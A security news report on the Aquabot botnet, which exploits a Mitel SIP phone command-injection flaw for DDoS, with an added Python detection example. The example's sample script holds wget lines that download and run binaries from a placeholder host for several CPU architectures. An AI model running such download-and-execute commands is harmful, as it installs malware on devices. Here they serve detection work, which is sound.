Aquabot Botnet Exploiting Mitel Phone Vulnerability to Fuel DDoS Attacks

A newly observed Mirai-based botnet variant, known as Aquabot, has been actively exploiting a command injection flaw in Mitel SIP phones to enlist them into a DDoS attack network.

The vulnerability in question, CVE-2024-41710 (CVSS score: 6.8), affects Mitel 6800, 6900, and 6900w Series SIP Phones, as well as the Mitel 6970 Conference Unit. It allows arbitrary command execution during the boot process, potentially granting attackers remote control over affected devices. Mitel patched the issue in July 2024, but a proof-of-concept (PoC) exploit was made public in August, making exploitation attempts inevitable.

Expanding the Attack Surface

Aquabot doesn't just target CVE-2024-41710—it also attempts to exploit older, known vulnerabilities, including CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw in Linksys E-series devices.

First identified in November 2023, Aquabot's primary goal is to build a botnet for large-scale DDoS attacks, according to Akamai researchers Kyle Lefton and Larry Cashdollar. Since January 2025, researchers have observed active exploitation attempts using attack payloads that closely resemble the publicly available PoC exploit.

The attack sequence includes executing a shell script that uses the "wget" command to download Aquabot binaries suited for different CPU architectures.

Aquabot’s Evasive and Persistent Features

The latest version of Aquabot appears to be the third iteration of the malware, introducing a "report_kill" function that notifies the C2 server whenever the bot is terminated. While no direct response from the C2 server has been observed, researchers suspect this function could be part of future stealth enhancements or used to counteract rival botnets.

Additional stealth tactics include:

  • Disguising itself as "httpd.x86" to blend in with system processes.
  • Terminating processes that match certain conditions, such as local shell sessions.
  • Enhanced signal handling, potentially to detect anti-malware activity or competing botnet threats.
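Two of the behaviours described above, the multi-architecture "wget" downloader script and the "httpd.x86" process disguise, can be turned into simple host-side detection logic. The following is an added example, not code from the article or from Akamai; the script text, host name, file names and process listing are constructed samples, not indicators taken from the report.

```python
import re
from collections import defaultdict

# Constructed sample downloader script, modelled on the article's description
# of a shell script that wgets one Aquabot binary per CPU architecture.
# "malware.example" and the file names are placeholders, not real indicators.
SAMPLE_SCRIPT = """
cd /tmp
wget http://malware.example/bins/aq.x86 -O httpd.x86; chmod +x httpd.x86; ./httpd.x86
wget http://malware.example/bins/aq.arm7 -O httpd.arm7; chmod +x httpd.arm7; ./httpd.arm7
wget http://malware.example/bins/aq.mips -O httpd.mips; chmod +x httpd.mips; ./httpd.mips
"""

# Constructed ps-style listing: (pid, executable path, process name).
SAMPLE_PROCS = [
    (812, "/usr/sbin/httpd", "httpd"),       # legitimate web server
    (2033, "/tmp/httpd.x86", "httpd.x86"),   # bot disguised as httpd, running from /tmp
]

# Architecture suffixes commonly seen on Mirai-style per-CPU binaries (assumed list).
ARCH_TOKENS = ("x86", "x86_64", "arm", "arm5", "arm6", "arm7", "mips", "mipsel", "ppc", "sh4", "m68k")
WGET_RE = re.compile(r"\bwget\s+(?P<url>\S+)")
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/")


def multi_arch_downloads(script: str, min_archs: int = 2) -> dict:
    """Return {host: [arch, ...]} for hosts from which the script fetches
    binaries for at least min_archs distinct CPU architectures."""
    per_host = defaultdict(set)
    for m in WGET_RE.finditer(script):
        url = m.group("url")
        host = re.sub(r"^\w+://", "", url).split("/")[0]
        name = url.rsplit("/", 1)[-1]
        for tok in ARCH_TOKENS:
            # match the token only as a trailing suffix, e.g. "aq.arm7" or "bot-mips"
            if re.search(rf"(^|[._-]){re.escape(tok)}$", name):
                per_host[host].add(tok)
    return {h: sorted(a) for h, a in per_host.items() if len(a) >= min_archs}


def masquerading_httpd(procs) -> list:
    """Flag PIDs of processes named like httpd that run from outside trusted system directories."""
    return [pid for pid, path, name in procs
            if name.startswith("httpd") and not path.startswith(TRUSTED_DIRS)]


if __name__ == "__main__":
    print(multi_arch_downloads(SAMPLE_SCRIPT))
    print(masquerading_httpd(SAMPLE_PROCS))
```

On real hosts, feed `masquerading_httpd` with data read from `/proc/<pid>/exe` and `/proc/<pid>/comm`, and run `multi_arch_downloads` over scripts recovered from proxy logs or writable directories such as /tmp.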

Botnet-for-Hire Services on Telegram

There is growing evidence suggesting that Aquabot’s operators are monetizing their botnet by offering DDoS-for-hire services on Telegram under names like Cursinq Firewall, The Eye Services, and The Eye Botnet.

Despite claims that these networks are used only for testing DDoS mitigation, deeper investigations have revealed advertisements for DDoS-as-a-service offerings and bragging about botnet control in underground Telegram groups.

Ongoing Threat of Mirai-Based Botnets

Aquabot is yet another example of how Mirai-based malware continues to exploit insecure, internet-connected devices, especially those with default credentials, outdated firmware, or poor security configurations. Such devices remain prime targets for cybercriminals looking to build powerful DDoS attack networks.

As threat actors evolve their techniques, device manufacturers and users must stay vigilant—regularly patching vulnerabilities, restricting remote access, and enforcing strong authentication are essential steps in mitigating the risks posed by botnets like Aquabot.